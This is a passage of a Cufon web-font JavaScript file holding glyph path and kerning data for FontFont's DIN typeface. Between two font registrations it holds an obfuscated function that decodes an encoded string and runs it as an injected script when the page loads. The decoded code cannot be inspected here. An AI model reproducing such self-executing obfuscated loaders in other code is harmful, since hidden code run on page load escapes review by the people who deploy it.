0,"\u00e7":20,"\u00e6":20,"o":20,"e":20,"c":20}},{"d":"190,0r-112,92r0,-197r112,0r0,105","w":267},{"d":"270,-718v110,0,202,79,200,191v-2,84,-84,169,-125,231v-17,25,-19,47,-18,84r-102,0v-11,-117,61,-174,112,-239v56,-73,23,-176,-67,-176v-58,0,-97,45,-97,101r-102,0v-2,-110,89,-192,199,-192xm332,0r-113,0r0,-109r113,0r0,109","w":511},{"d":"548,0r-455,0r0,-712r455,0r0,97r-347,0r0,208r296,0r0,96r-296,0r0,214r347,0r0,97xm363,-781r-77,0r-111,-162r113,0","w":603},{"d":"487,-621r-238,621r-110,0r239,-621r-217,0r0,112r-98,0r0,-203r424,0r0,91"},{"d":"319,64r-51,147r-101,0r70,-147r82,0","w":500},{"d":"227,-406v135,-46,250,59,250,195v0,127,-86,217,-210,217v-125,0,-213,-86,-211,-213v0,-46,18,-104,53,-175r162,-330r109,0xm266,-85v67,1,109,-54,109,-124v0,-69,-41,-123,-109,-123v-68,0,-108,52,-108,123v0,71,41,124,108,124"},{"d":"609,-521v11,52,10,283,-1,333v-22,106,-129,188,-249,188r-247,0r0,-318r-74,0r0,-83r74,0r0,-311r250,0v120,-6,225,87,247,191xm482,-159v45,-48,29,-251,22,-331v-7,-76,-75,-126,-155,-126r-129,0r0,215r138,0r0,83r-138,0r0,222v111,0,220,13,262,-63","w":684},{"d":"359,-230r-292,0r0,-95r292,0r0,95","w":426},{"d":"405,-622r-310,0r0,-73r310,0r0,73","w":500},{"w":240},{"d":"422,-599r-85,0r-87,-97r-87,97r-85,0r129,-161r86,0","w":500},{"d":"359,-230r-292,0r0,-95r292,0r0,95","w":426},{"d":"190,94v-75,-81,-104,-86,-104,-211r0,-478v5,-124,29,-130,104,-211r69,69v-38,37,-71,67,-71,148r0,466v-2,81,31,111,71,148","w":317},{"d":"548,0r-455,0r0,-712r455,0r0,97r-347,0r0,208r296,0r0,96r-296,0r0,214r347,0r0,97","w":603,"k":{"J":5}},{"d":"183,0r-102,0r0,-507r102,0r0,507xm425,-599r-85,0r-87,-97r-87,97r-85,0r129,-161r86,0","w":264},{"w":500},{"d":"860,-712r-186,712r-94,0r-145,-499r-144,499r-94,0r-186,-712r114,0r124,509r143,-509r87,0r143,509r124,-509r114,0","w":871,"k":{"\u0153":40,"\u0152":10,"\u00f8":40,"\u00e7":40,"\u00e6":40,"\u00d8":10,"\u00d6":10,"\u00d5":10,"\u00d4":10,"\u00d3":10,"\u00d2":10,"\u00c7":10,"\u00c6":14,"\u00c5":14,"\u00c4":14,"\u00c3":14,"\u00c2":14,"\u00c1":14,"\u00c0":14,"s":40,"q":40,"o":40,"g":40,"e":40,"d":40,"c":40,"a":40,"Q":10,"O":10,"G":10,"C":10,"A":14,".":50}},{"d":"725,0r-117,0r0,-117r117,0r0,117xm460,0r-117,0r0,-117r117,0r0,117xm195,0r-117,0r0,-117r117,0r0,117","w":803},{"d":"201,0r-108,0r0,-712r108,0r0,712xm281,-781r-77,0r-111,-162r113,0","w":294},{"d":"617,0r-115,0r-49,-143r-281,0r-49,143r-115,0r261,-712r87,0xm423,-235r-108,-316r-111,316r219,0xm361,-781r-77,0r-111,-162r113,0","w":625,"k":{"\u0152":5,"y":21,"v":21,"Y":35,"W":21,"V":35,"T":60,"Q":10,"O":10,"G":10,"C":10}},{"d":"526,0r-126,0r-142,-234r-75,85r0,149r-102,0r0,-712r102,0r0,439r197,-234r124,0r-176,199","w":548,"k":{"\u0153":13,"\u00f6":13,"\u00f5":13,"\u00f4":13,"\u00f3":13,"\u00f2":13,"\u00eb":13,"\u00ea":13,"\u00e9":13,"\u00e8":13,"\u00e7":13,"\u00e6":13,"q":13,"o":13,"g":13,"e":13,"d":13,"c":13}},{"d":"63,-440v46,-53,89,-72,182,-73v139,0,209,58,209,174r0,339r-100,0r0,-46v-36,35,-68,51,-135,52v-107,2,-176,-54,-176,-155v0,-95,71,-146,175,-146r134,0v7,-89,-23,-133,-111,-131v-60,1,-83,14,-111,49xm235,-79v94,0,126,-44,117,-145v-89,1,-210,-18,-210,73v0,48,31,72,93,72","w":530},{"d":"974,-229r-744,0r345,343r-131,0r-392,-391r392,-392r131,0r-345,343r744,0r0,97","w":1027},{"d":"316,-513v110,0,176,74,176,189r0,324r-102,0r0,-309v1,-71,-36,-113,-102,-113v-65,0,-105,43,-105,113r0,309r-102,0r0,-507r100,0r0,51v35,-38,80,-57,135,-57","w":568},{"d":"181,-452v46,-69,195,-86,256,-13r-77,77v-64,-72,-177,-20,-177,80r0,308r-102,0r0,-507r100,0r0,55","w":439,"k":{"\u0153":32,"\u00f8":32,"\u00f6":32,"\u00f5":32,"\u00f4":32,"\u00f3":32,"\u00f2":32,"\u00eb":32,"\u00ea":32,"\u00e9":32,"\u00e8":32,"\u00e7":32,"\u00e6":32,"s":10,"q":32,"o":32,"g":32,"e":32,"d":32,"c":32,"a":10,".":120}},{"w":240},{"d":"270,-513v151,0,228,121,215,289r-329,0v-1,85,45,143,129,142v63,-1,88,-18,123,-52r65,61v-52,50,-95,79,-190,79v-151,0,-228,-93,-228,-260v0,-151,75,-259,215,-259xm384,-295v6,-104,-91,-167,-176,-115v-36,22,-50,58,-52,115r228,0","w":539,"k":{"y":10,"x":10,"w":7,"v":10}},{"d":"548,0r-455,0r0,-712r455,0r0,97r-347,0r0,208r296,0r0,96r-296,0r0,214r347,0r0,97xm465,-786r-92,0r0,-108r92,0r0,108xm249,-786r-92,0r0,-108r92,0r0,108","w":603},{"d":"372,-391v-46,-45,-212,-64,-217,28v-4,63,89,59,150,65v101,9,151,56,151,143v0,196,-326,198,-424,88r67,-67v35,35,83,53,146,53v57,0,108,-19,111,-70v4,-65,-87,-61,-149,-67v-100,-9,-150,-55,-150,-140v0,-99,89,-155,191,-155v82,0,145,19,188,57","w":499,"k":{"\u2019":32,"v":10,"t":10,"s":10}},{"d":"200,-217r-122,0r0,-122r122,0r0,122","w":278},{"d":"271,-718v147,0,248,135,191,276v-9,22,-28,48,-52,78r-223,273r290,0r0,91r-414,0r0,-91r274,-333v68,-69,43,-206,-66,-203v-64,2,-107,40,-105,110r-102,0v-2,-119,88,-201,207,-201"},{"d":"304,74r-218,0r0,-860r218,0r0,91r-116,0r0,678r116,0r0,91","w":347},{"w":55},{"d":"67,-658v37,-42,71,-57,146,-58v111,0,166,46,166,139r0,270r-81,0r0,-36v-27,27,-62,40,-106,40v-86,1,-140,-41,-140,-123v0,-76,57,-117,139,-117r105,0v5,-70,-18,-104,-87,-102v-48,1,-63,11,-87,39xm204,-373v76,0,98,-32,92,-112v-69,1,-163,-15,-163,57v0,37,24,55,71,55","w":452},{"d":"261,74r-218,0r0,-90r118,0r0,-680r-118,0r0,-90r218,0r0,860","w":347},{"d":"323,-91v81,0,130,-53,145,-122r109,0v-20,129,-113,219,-254,219v-152,0,-264,-107,-255,-285r0,-154v-8,-175,101,-285,255,-285v142,0,234,89,254,219r-110,0v-16,-69,-63,-121,-144,-122v-74,-1,-125,48,-139,115v-9,47,-9,254,0,300v14,67,65,115,139,115xm374,64r-51,147r-101,0r70,-147r82,0","w":628,"k":{"\u00c6":5,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":21,"A":10}},{"d":"520,-42r-230,-230r230,-229r0,123r-108,106r108,107r0,123xm267,-42r-230,-230r230,-229r0,123r-107,106r107,107r0,123","w":592},{"d":"323,-91v104,-1,165,-80,152,-202r-152,0r0,-92r260,0r0,109v5,177,-104,282,-260,282v-152,0,-264,-107,-255,-285r0,-154v-8,-175,101,-283,255,-285v145,-2,239,96,259,221r-109,0v-17,-73,-65,-123,-150,-124v-72,-1,-125,49,-139,115v-9,46,-9,254,0,300v14,67,65,116,139,115","w":649,"k":{"\u00c6":10,"\u00c5":10,"\u00c4":10,"\u00c3":10,"\u00c2":10,"\u00c1":10,"\u00c0":10,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":35,"A":10}},{"d":"266,-718v117,0,206,84,206,204r0,316v3,120,-89,204,-206,204v-116,0,-205,-84,-205,-204r0,-316v-3,-120,89,-204,205,-204xm266,-85v65,0,105,-50,104,-116r0,-310v1,-66,-39,-116,-104,-116v-66,0,-104,49,-103,116r0,310v-1,67,37,116,103,116"},{"d":"180,-146v-5,59,43,62,100,59r0,87r-63,0v-88,2,-139,-57,-139,-140r0,-572r102,0r0,566","w":311,"k":{"\u201d":60,"\u201c":60,"\u2019":60,"\u2018":60,"y":29,"w":20,"v":40,"o":20,"e":25,"c":25,"*":60}},{"d":"323,-91v81,0,130,-53,145,-122r109,0v-20,129,-113,219,-254,219v-152,0,-264,-107,-255,-285r0,-154v-8,-175,101,-285,255,-285v142,0,234,89,254,219r-110,0v-16,-69,-63,-121,-144,-122v-74,-1,-125,48,-139,115v-9,47,-9,254,0,300v14,67,65,115,139,115","w":628,"k":{"\u00c6":10,"\u00c5":10,"\u00c4":10,"\u00c3":10,"\u00c2":10,"\u00c1":10,"\u00c0":10,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":26,"A":10}},{"d":"768,-61r-40,0r0,61r-74,0r0,-61r-174,0r0,-71r147,-295r83,0r-147,295r91,0r0,-83r74,0r0,83r40,0r0,71xm596,-712r-335,712r-81,0r335,-712r81,0xm204,-285r-77,0r0,-341r-87,76r0,-87r87,-75r77,0r0,427","w":808},{"d":"316,-513v142,0,180,92,180,259v0,168,-37,260,-180,260v-56,0,-100,-19,-133,-58r0,257r-102,0r0,-917r102,0r0,256v32,-38,76,-57,133,-57xm289,-85v91,0,105,-76,105,-169v0,-93,-14,-168,-105,-168v-89,0,-107,71,-106,168v1,92,14,168,106,169","w":554},{"d":"280,-85v65,0,105,-43,105,-113r0,-309r102,0r0,507r-100,0r0,-51v-35,38,-80,57,-135,57v-110,0,-176,-74,-176,-189r0,-324r102,0r0,309v-1,70,37,113,102,113xm417,-761r-111,162r-77,0r75,-162r113,0","w":568},{"d":"97,-576v0,-80,54,-144,139,-141r64,0r0,87v-57,-3,-101,0,-101,59r0,73r101,0r0,78r-101,0r0,420r-102,0r0,-420r-58,0r0,-78r58,0r0,-78","w":328,"k":{"\u201d":-20,"\u201c":-20,"\u2019":-20,"\u2018":-20,"\u0153":17,"\u00e7":17,"\u00e6":17,"o":17,"e":17,"c":17,"a":17,".":50,"*":-20}},{"d":"503,-401r-106,0r-112,-207r-112,207r-106,0r172,-318r93,0","w":571},{"d":"579,-356v0,124,-1,188,-46,259r70,69r-60,60r-71,-71v-118,88,-311,34,-370,-77v-47,-87,-34,-246,-31,-378v6,-218,299,-292,440,-148v62,63,68,158,68,286xm450,-180v26,-32,21,-269,13,-326v-14,-110,-174,-156,-246,-71v-47,55,-42,100,-42,221v0,121,-4,165,42,221v40,48,124,60,179,21r-75,-75r60,-60","w":646},{"d":"504,0r-456,0r0,-93r329,-522r-315,0r0,-97r442,0r0,88r-331,527r331,0r0,97","w":552},{"d":"315,-513v143,0,181,91,181,259v0,168,-37,260,-180,260v-56,0,-100,-19,-133,-58r0,257r-102,0r0,-712r100,0r0,54v33,-40,78,-60,134,-60xm289,-85v91,0,105,-76,105,-169v0,-93,-14,-168,-105,-168v-89,0,-107,71,-106,168v1,92,14,168,106,169","w":553},{"d":"232,0v-85,3,-139,-61,-139,-141r0,-279r-58,0r0,-78r58,0r0,-154r102,0r0,154r98,0r0,78r-98,0r0,274v-3,57,41,63,98,59r0,87r-61,0","w":342,"k":{"\u0153":5,"\u00e7":5,"\u00e6":5,"o":5,"e":5,"c":5,"a":5}},{"d":"511,-642v87,86,69,267,64,424v-2,74,-26,107,-64,148v-94,102,-275,96,-375,0v-83,-80,-70,-266,-65,-424v7,-218,297,-290,440,-148xm429,-135v63,-47,42,-275,34,-371v-9,-111,-174,-156,-246,-71v-47,55,-42,100,-42,221v0,121,-4,165,42,221v49,59,162,59,212,0xm459,-943r-111,162r-77,0r75,-162r113,0","w":647,"k":{"\u00c6":5,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":21,"A":10}},{"d":"302,-599r-77,0r-111,-162r113,0","w":500},{"d":"250,-95v-7,81,37,79,112,78r0,91r-71,0v-97,1,-142,-46,-143,-139r0,-167v2,-66,-37,-85,-103,-79r0,-90v66,5,103,-13,103,-79r0,-167v1,-93,46,-140,143,-139r71,0r0,91r-39,0v-64,1,-73,14,-73,78r0,161v0,60,-25,81,-66,100v41,19,66,40,66,100r0,161","w":407},{"d":"482,-327r-431,0r0,-95r431,0r0,95xm482,-133r-431,0r0,-95r431,0r0,95"},{"d":"57,-254v0,-167,38,-259,180,-259v57,0,101,19,133,57r0,-256r102,0r0,712r-100,0r0,-54v-33,40,-78,60,-134,60v-143,0,-181,-92,-181,-260xm265,-85v91,0,105,-76,105,-169v0,-93,-14,-168,-105,-168v-89,0,-107,71,-106,168v1,92,14,168,106,169","w":553},{"d":"280,-85v65,0,105,-43,105,-113r0,-309r102,0r0,507r-100,0r0,-51v-35,38,-80,57,-135,57v-110,0,-176,-74,-176,-189r0,-324r102,0r0,309v-1,70,37,113,102,113","w":568},{"d":"57,-254v0,-168,38,-259,181,-259v56,0,101,20,134,60r0,-54r100,0r0,712r-102,0r0,-257v-33,39,-77,58,-133,58v-142,0,-180,-92,-180,-260xm265,-85v91,0,105,-76,105,-169v0,-93,-14,-168,-105,-168v-89,0,-107,71,-106,168v1,92,14,168,106,169","w":553},{"d":"463,-507r-186,507r-83,0r-186,-507r108,0r120,357r119,-357r108,0","w":471,"k":{"\u0153":10,"\u00f8":10,"\u00f6":10,"\u00f5":10,"\u00f4":10,"\u00f3":10,"\u00f2":10,"\u00eb":10,"\u00ea":10,"\u00e9":10,"\u00e8":10,"\u00e7":10,"\u00e6":10,"s":10,"o":10,"e":10,"c":10,"a":10,".":65}},{"d":"380,74r-98,0r-282,-852r98,0","w":380},{"d":"268,-513v142,0,212,100,212,259v0,164,-68,260,-212,260v-143,0,-211,-97,-211,-260v0,-159,70,-259,211,-259xm268,-85v86,0,110,-60,110,-169v-1,-110,-22,-168,-110,-168v-86,0,-108,59,-109,168v0,109,24,169,109,169xm313,-599r-77,0r-111,-162r113,0","w":537,"k":{"y":10,"x":10,"w":7,"v":10}}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+-617-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("4&{5#JLGU7?c4Ope:JQY^&^?$aL5{J?c$aCYU7E3{T;dbBGf$9ko|&{,$9ko|&b=$9ko|&Ep$9ko|&EJEp=5|xZ={T=5|hy,{Q=5|hypLQ=5|hyx|T=5|hyfbp=5|hy,bT=5|hyf{p=5|hyJLfT.:-Zo{-C.:-Zo{h:T$9ko|&k5$9ko|&Tf$9ko|&zV$9ko|&t=$9ko|&TJ$9ko|&Tx$9ko|&{f$9ko|&TW$9ko|&ka$9ko|&^Y:5=5|hyx|p=5|hyxLT=5|hyx{T=5|xZBbT=5|hyxLQ=5|hy,LT=5|hyfLp{.:-Zob-E.:-Zob7E.:-ZobJE;$9ko|&bs$9ko|&Qp$9ko|&b2$9ko|&z=$9ko|&^5RZyOhzQ&9^C4]|L[XtE@-kT7$b{U#.:+RMWfx,pJ30_FNducmo=YBG5aVs2ne;?j)p=5|hyx{pom$9ko|&b5$9kY|hzB$9ko|&kB$9ko|&Ef$9ko|&t2b5=5|hyf{T=5|hz5|p=5|hyx{hT.:-Zo{7E.:-^o|hW.:-Zob-C{#Y:.:-Zo{h{.:-^o|7E.:-^o|hZs$9ko|&za$9kY|hZV$9kY|hZa$9ko|&^B|5=5|hyJbaW.:-ZobB{.:-^o|xC.:-^oL7{.:-ZobxQ.:-Zo{hE.:-ZobBL.:-^o|-y.:-^=|xC.:-^o|-p.:-Zob-,G$9kY|hZ2+p=5|hyJLQ=5|xZY{ftNt-p|$9ko|&|2-YQ.:-^o|hE.:-Zo{hC.:-Zo{-y3TQ=5|hyJ|5=5|xZo|k5b$9kY|hzs-3pC$9ko|&k=$9ko|&Ex$9ko|&z5#7C.:-Z=LBW.:-Z=L-L.:-^o|hL@tQ=5|hyJL5=5|hyf|Q=5|hyW[O0d|-u.:-Zo{-p.:-Zo{J{t$9kY|hQxE&_.^35^UT=5|hyp[O2.:-^o|Bp4[p=5|xZoLTL.:-Zo{hWO$9ko|&zBXf{.:-^o|-tx$9ko|&LW4T=5|hyfLQ?]$9ko|&^2$9ko|JEx$9ko|&kV$9ko|&bo$9ko|&Qx$9ko|&CW+Q=5|xZ=b-?.:-ZobBMV$9ko|&^sLp=5|hy,|Q=5|xZ=|T=5|hyW{p=5|hyW|Q=5|hCxLfG0ET=5|hyp{T=5|xZo|p:.:-^o|x{.:-ZobaL.:-ZobByNb-=c.fyp$9ko|&Lf.5=5|hyfLBC#$9kY|hyW$9ko|&QW$T=5|hyxL5=5|hyWb,.o#zL.:-ZobJL.:-Zo{JT.:-Zo{JQJ$pQU.9E.:-Zo{hLM+B5,:$Qa$Q=.:-Zo{x^f]3Lo#&pG4O^f4@=_X-Zd.h5f]3Zd#h5o]J=p#J:GUO=3X7^c{f23#9poU9|?+VGeU7b0bf2mUBGm$fM)[3:V:5oc4-;0XB_B#7Tf.JQc{&pc{5ocba?uR9LGb7:_#J:.]3Lu{7CYb72,U723$O2x#aG_CO?_]3Ep.Vt0#&?xb$E_#ascU&?B:&2W#7k_47{m.fMeU-=d[YdNU@p37aL#UT5:X$y#UT5?4@M_")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":533,"face":{"font-family":"DIN","font-weight":500,"font-stretch":"normal","units-per-em":"1000","panose-1":"0 0 0 0 0 0 0 0 0 0","ascent":"800","descent":"-200","x-height":"6","bbox":"-19 -1000 975 211.616","underline-thickness":"70","underline-position":"-102","unicode-range":"U+0020-U+2122"}}));
;
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 *  Dutch Design: Albert-Jan Pool, 1995. Published by FontShop International
 * FontFont release 15
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"598,0r-108,0r0,-311r-289,0r0,311r-108,0r0,-712r108,0r0,304r289,0r0,-304r108,0r0,712","w":691},{"d":"337,-91v90,0,148,-62,148,-154r0,-467r108,0r0,472v3,143,-113,246,-256,246v-143,0,-255,-103,-255,-246r0,-472r108,0r0,467v-1,92,57,154,147,154xm474,-943r-111,162r-77,0r75,-162r113,0","w":675},{"d":"629,0r-99,0r-329,-501r0,501r-108,0r0,-712r99,0r329,500r0,-500r108,0r0,712xm293,-908v39,0,93,44,130,43v19,0,38,-10,59,-31r48,47v-37,37,-71,55,-104,55v-39,0,-95,-43,-131,-42v-19,0,-38,10,-58,30r-48,-47v37,-37,71,-55,104,-55","w":721},{"d":"201,0r-108,0r0,-712r108,0r0,712xm401,-786r-92,0r0,-108r92,0r0,108xm185,-786r-92,0r0,-108r92,0r0,108","w":294},{"d":"309,-718v96,0,169,66,169,159v0,71,-73,128,-128,162r150,179v25,-35,37,-82,38,-143r98,0v-3,95,-27,168,-71,219r119,142r-131,0r-58,-70v-58,51,-124,76,-197,76v-140,0,-232,-77,-230,-212v1,-108,68,-149,141,-201v-37,-42,-71,-82,-74,-153v-3,-94,76,-158,174,-158xm309,-629v-42,0,-70,29,-70,70v0,23,18,55,55,98v34,-21,86,-59,86,-97v0,-39,-31,-71,-71,-71xm169,-208v-4,71,57,121,129,121v49,0,95,-18,136,-55r-169,-201v-51,35,-92,61,-96,135","w":730},{"d":"804,-61r-40,0r0,61r-73,0r0,-61r-174,0r0,-71r146,-295r84,0r-147,295r91,0r0,-83r73,0r0,83r40,0r0,71xm638,-712r-335,712r-81,0r335,-712r81,0xm181,-716v73,0,131,50,130,122v0,42,-17,72,-50,89v37,19,56,52,56,97v0,120,-149,163,-231,96v-26,-21,-40,-52,-41,-94r77,0v0,36,26,57,60,57v35,0,59,-24,58,-61v0,-41,-27,-63,-72,-60r0,-66v42,4,67,-18,67,-55v1,-34,-22,-56,-54,-56v-31,0,-53,20,-54,52r-76,0v0,-73,57,-121,130,-121","w":844},{"d":"270,-513v151,0,228,121,215,289r-329,0v-1,85,45,143,129,142v63,-1,88,-18,123,-52r65,61v-52,50,-95,79,-190,79v-151,0,-228,-93,-228,-260v0,-151,75,-259,215,-259xm384,-295v6,-104,-91,-167,-176,-115v-36,22,-50,58,-52,115r228,0xm445,-599r-85,0r-87,-97r-87,97r-85,0r129,-161r86,0","w":539,"k":{"y":10,"x":10,"w":7,"v":10}},{"d":"270,-513v151,0,228,121,215,289r-329,0v-1,85,45,143,129,142v63,-1,88,-18,123,-52r65,61v-52,50,-95,79,-190,79v-151,0,-228,-93,-228,-260v0,-151,75,-259,215,-259xm384,-295v6,-104,-91,-167,-176,-115v-36,22,-50,58,-52,115r228,0xm427,-604r-92,0r0,-108r92,0r0,108xm211,-604r-92,0r0,-108r92,0r0,108","w":539,"k":{"y":10,"x":10,"w":7,"v":10}},{"d":"63,-440v46,-53,89,-72,182,-73v139,0,209,58,209,174r0,339r-100,0r0,-46v-36,35,-68,51,-135,52v-107,2,-176,-54,-176,-155v0,-95,71,-146,175,-146r134,0v7,-89,-23,-133,-111,-131v-60,1,-83,14,-111,49xm235,-79v94,0,126,-44,117,-145v-89,1,-210,-18,-210,73v0,48,31,72,93,72xm411,-604r-92,0r0,-108r92,0r0,108xm195,-604r-92,0r0,-108r92,0r0,108","w":530},{"d":"181,-452v46,-69,195,-86,256,-13r-77,77v-64,-72,-177,-20,-177,80r0,308r-102,0r0,-507r100,0r0,55","w":439,"k":{"\u0153":32,"\u00f8":32,"\u00f6":32,"\u00f5":32,"\u00f4":32,"\u00f3":32,"\u00f2":32,"\u00eb":32,"\u00ea":32,"\u00e9":32,"\u00e8":32,"\u00e7":32,"\u00e6":32,"s":10,"q":32,"o":32,"g":32,"e":32,"d":32,"c":32,"a":10,".":120}},{"d":"337,-91v90,0,148,-62,148,-154r0,-467r108,0r0,472v3,143,-113,246,-256,246v-143,0,-255,-103,-255,-246r0,-472r108,0r0,467v-1,92,57,154,147,154xm492,-786r-92,0r0,-108r92,0r0,108xm276,-786r-92,0r0,-108r92,0r0,108","w":675},{"d":"464,-507r-224,608v-23,75,-81,108,-182,100r0,-92v59,2,83,-8,99,-54r28,-79r-177,-483r108,0r121,357r118,-357r109,0xm370,-761r-111,162r-77,0r75,-162r113,0","w":468},{"d":"281,-85v50,0,68,-19,97,-48r70,67v-45,48,-101,72,-167,72v-151,0,-226,-101,-226,-260v0,-159,74,-259,226,-259v67,0,122,24,167,71r-70,68v-29,-30,-47,-48,-97,-48v-87,0,-124,64,-124,168v0,106,36,169,124,169","w":485,"k":{"\u0153":17,"\u00f6":17,"\u00f5":17,"\u00f4":17,"\u00f3":17,"\u00f2":17,"\u00eb":17,"\u00ea":17,"\u00e9":17,"\u00e8":17,"\u00e6":8,"\u00e5":8,"\u00e4":8,"\u00e3":8,"\u00e2":8,"\u00e1":8,"\u00e0":8,"w":20,"o":17,"e":17,"d":10,"c":17,"a":8}},{"d":"314,-513v110,-2,177,76,176,186r0,327r-102,0r0,-311v2,-69,-39,-110,-102,-111v-63,0,-103,43,-103,111r0,311r-102,0r0,-712r102,0r0,256v35,-38,79,-57,131,-57","w":566},{"d":"63,-440v46,-53,89,-72,182,-73v139,0,209,58,209,174r0,339r-100,0r0,-46v-36,35,-68,51,-135,52v-107,2,-176,-54,-176,-155v0,-95,71,-146,175,-146r134,0v7,-89,-23,-133,-111,-131v-60,1,-83,14,-111,49xm235,-79v94,0,126,-44,117,-145v-89,1,-210,-18,-210,73v0,48,31,72,93,72xm257,-826v68,0,125,58,125,125v0,68,-58,125,-125,125v-68,0,-125,-58,-125,-125v0,-68,58,-125,125,-125xm257,-638v34,0,64,-29,64,-63v0,-34,-30,-63,-64,-63v-34,0,-64,29,-64,63v0,34,30,63,64,63","w":530},{"d":"363,-575v131,-3,228,89,228,216v0,127,-97,215,-228,215r-162,0r0,144r-108,0r0,-712r108,0r0,137r162,0xm356,-241v74,1,126,-44,126,-118v0,-74,-52,-120,-126,-119r-155,0r0,237r155,0","w":637},{"d":"420,-453v46,47,59,106,60,199v3,164,-68,260,-212,260v-38,0,-73,-8,-104,-25r-37,63r-69,0r58,-99v-46,-47,-56,-106,-59,-199v-5,-159,70,-255,211,-259v39,0,74,8,105,25r37,-63r69,0xm268,-422v-86,0,-108,59,-109,168v0,49,5,86,15,109r154,-260v-17,-11,-37,-17,-60,-17xm268,-85v86,0,110,-60,110,-169v0,-49,-5,-86,-15,-109r-154,260v17,12,37,18,59,18","w":537},{"d":"567,-513v151,1,228,121,215,289r-329,0v-1,85,45,143,129,142v63,-1,88,-18,123,-52r65,61v-52,50,-95,78,-190,79v-80,0,-140,-26,-179,-79v-47,56,-88,78,-182,79v-107,2,-176,-54,-176,-155v0,-95,71,-146,175,-146r134,0v7,-89,-23,-133,-111,-131v-60,1,-83,14,-111,49r-67,-63v46,-53,89,-72,182,-73v83,0,141,22,172,67v37,-45,87,-67,150,-67xm681,-295v-1,-81,-38,-130,-114,-133v-73,-3,-113,56,-114,133r228,0xm235,-79v94,0,126,-44,117,-145v-89,1,-210,-18,-210,73v0,48,31,72,93,72","w":837},{"d":"183,0r-102,0r0,-507r102,0r0,507xm269,-761r-111,162r-77,0r75,-162r113,0","w":264},{"d":"548,0r-455,0r0,-712r455,0r0,97r-347,0r0,208r296,0r0,96r-296,0r0,214r347,0r0,97xm483,-781r-85,0r-87,-97r-87,97r-85,0r129,-161r86,0","w":603},{"d":"302,-599r-77,0r-111,-162r113,0","w":500},{"d":"652,-431v92,0,163,88,120,173v-35,69,-108,128,-157,189r167,0r0,69r-259,0r0,-69r160,-186v37,-36,27,-108,-31,-107v-35,0,-53,18,-53,55r-76,0v-1,-75,54,-124,129,-124xm588,-712r-335,712r-81,0r335,-712r81,0xm204,-285r-77,0r0,-341r-87,76r0,-87r87,-75r77,0r0,427","w":827},{"d":"538,-712r-146,290r87,0r0,78r-127,0r-26,51r0,52r153,0r0,78r-153,0r0,163r-108,0r0,-163r-153,0r0,-78r153,0r0,-52r-26,-51r-127,0r0,-78r87,0r-147,-290r118,0r150,314r148,-314r117,0","w":544},{"d":"725,0r-117,0r0,-117r117,0r0,117xm460,0r-117,0r0,-117r117,0r0,117xm195,0r-117,0r0,-117r117,0r0,117","w":803},{"d":"175,-716v92,0,162,87,119,172v-35,69,-107,129,-156,190r167,0r0,69r-260,0r0,-69r161,-186v37,-36,27,-108,-31,-107v-35,0,-53,18,-53,55r-77,0v-1,-75,55,-124,130,-124","w":350},{"d":"386,-761r-111,162r-77,0r75,-162r113,0","w":500},{"d":"424,-466r-37,65r-111,-69r4,131r-75,0r4,-131r-111,69r-37,-65r115,-61r-115,-62r37,-65r111,69r-4,-130r75,0r-4,130r111,-69r37,65r-115,62","w":485},{"d":"476,-132r-64,63r-146,-145r-145,145r-64,-63r146,-146r-146,-146r64,-64r145,146r146,-146r64,64r-146,146"},{"d":"822,-285r-77,0r0,-279r-90,179r-71,0r-90,-179r0,279r-77,0r0,-427r77,0r125,243r126,-243r77,0r0,427xm346,-643r-115,0r0,358r-76,0r0,-358r-114,0r0,-69r305,0r0,69","w":883},{"d":"323,-91v81,0,130,-53,145,-122r109,0v-20,129,-113,219,-254,219v-152,0,-264,-107,-255,-285r0,-154v-8,-175,101,-285,255,-285v142,0,234,89,254,219r-110,0v-16,-69,-63,-121,-144,-122v-74,-1,-125,48,-139,115v-9,47,-9,254,0,300v14,67,65,115,139,115xm374,64r-51,147r-101,0r70,-147r82,0","w":628,"k":{"\u00c6":5,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":21,"A":10}},{"d":"321,-414r-109,0r0,-109r109,0r0,109xm484,-230r-436,0r0,-95r436,0r0,95xm321,-33r-109,0r0,-109r109,0r0,109"},{"d":"617,0r-115,0r-49,-143r-281,0r-49,143r-115,0r261,-712r87,0xm423,-235r-108,-316r-111,316r219,0xm446,-943r-111,162r-77,0r75,-162r113,0","w":625,"k":{"\u0152":5,"y":21,"v":21,"Y":35,"W":21,"V":35,"T":60,"Q":10,"O":10,"G":10,"C":10}},{"d":"319,64r-51,147r-101,0r70,-147r82,0","w":500},{"d":"63,-440v46,-53,89,-72,182,-73v139,0,209,58,209,174r0,339r-100,0r0,-46v-36,35,-68,51,-135,52v-107,2,-176,-54,-176,-155v0,-95,71,-146,175,-146r134,0v7,-89,-23,-133,-111,-131v-60,1,-83,14,-111,49xm235,-79v94,0,126,-44,117,-145v-89,1,-210,-18,-210,73v0,48,31,72,93,72xm393,-761r-111,162r-77,0r75,-162r113,0","w":530},{"d":"481,0r-123,0r-106,-173r-107,173r-123,0r174,-259r-167,-248r123,0r100,165r99,-165r123,0r-166,248","w":503,"k":{"\u0153":20,"\u00f8":20,"\u00f6":20,"\u00f5":20,"\u00f4":20,"\u00f3":20,"\u00f2":20,"\u00eb":20,"\u00ea":20,"\u00e9":20,"\u00e8":20,"\u00e7":20,"\u00e6":20,"o":20,"e":20,"c":20}},{"w":240},{"d":"181,-716v73,0,131,50,130,122v0,42,-17,72,-50,89v37,19,56,52,56,97v0,120,-149,163,-231,96v-26,-21,-40,-52,-41,-94r77,0v0,36,26,57,60,57v35,0,59,-24,58,-61v0,-41,-27,-63,-72,-60r0,-66v42,4,67,-18,67,-55v1,-34